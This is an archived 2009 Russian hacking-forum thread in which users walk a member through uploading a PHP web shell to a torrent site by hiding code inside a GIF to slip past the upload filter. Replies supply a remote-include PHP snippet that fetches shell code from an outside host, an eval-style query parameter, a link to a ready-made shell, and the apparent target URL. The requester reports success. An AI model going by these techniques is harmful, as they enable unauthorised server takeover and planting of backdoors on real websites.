Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Нужно залить shell через картинку |
04.05.2009, 19:23
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
Нужно залить shell через картинку
Есть торрент в нем есть заливка картинок.
Могу залить картинку и сделать её не jpeg а php.
При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php.
Код:
-----------------------------220022761016327\r\nContent-Disposition: form-data; name="file";
\nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type:
и там дальше исходник картинки.
А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает.
Вобщем кто знает как обойти фильтр.
Все делается через post запрос.
Или скинте картинку с шелом |
|
|
04.05.2009, 20:41
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Состряпай в пейнте картинку 1 на 1.
Открой её фаром и на новой строке впиши код шелла (какой нидь не большой типа выполнялки команд).
К примеру гифка: http://rapidshare.com/files/229115118/m.gif.html
?ev=phpinfo();
Последний раз редактировалось Grey; 05.05.2009 в 01:05..
|
|
|
|
04.05.2009, 23:01
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
да все супер залил но теперь при заходе на эту страницу вылетает такое.
 |
|
|
|
04.05.2009, 23:21
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
|
|
|
|
04.05.2009, 23:23
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от S0ulVortex
да все супер залил но теперь при заходе на эту страницу вылетает такое.
Всё правильно, так и будет вылезать, но код при этом будет выполняться, а все остальное будет отображаться как html.
Если юзал мою картинку, то выполняй код так:
gif.php?ev=phpinfo();
|
|
|
|
09.05.2009, 10:41
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044
Репутация:
21
|
|
ну вот у меня трабл тоже самое я могу ... но на фотку твою добавил р57 не сработало (
|
|
|
|
09.05.2009, 11:08
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044
Репутация:
21
|
|
Грей обясни.. плз
|
|
|
|
09.05.2009, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
http://file-hran2006.narod.ru/shell.txt если нужен шелл, не ищи.
|
|
|
|
09.05.2009, 11:22
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044
Репутация:
21
|
|
мне тока кодировка фотки ( шелл есть )
|
|
|
|
09.05.2009, 11:37
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Спасибо, много узнал, читая тему.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
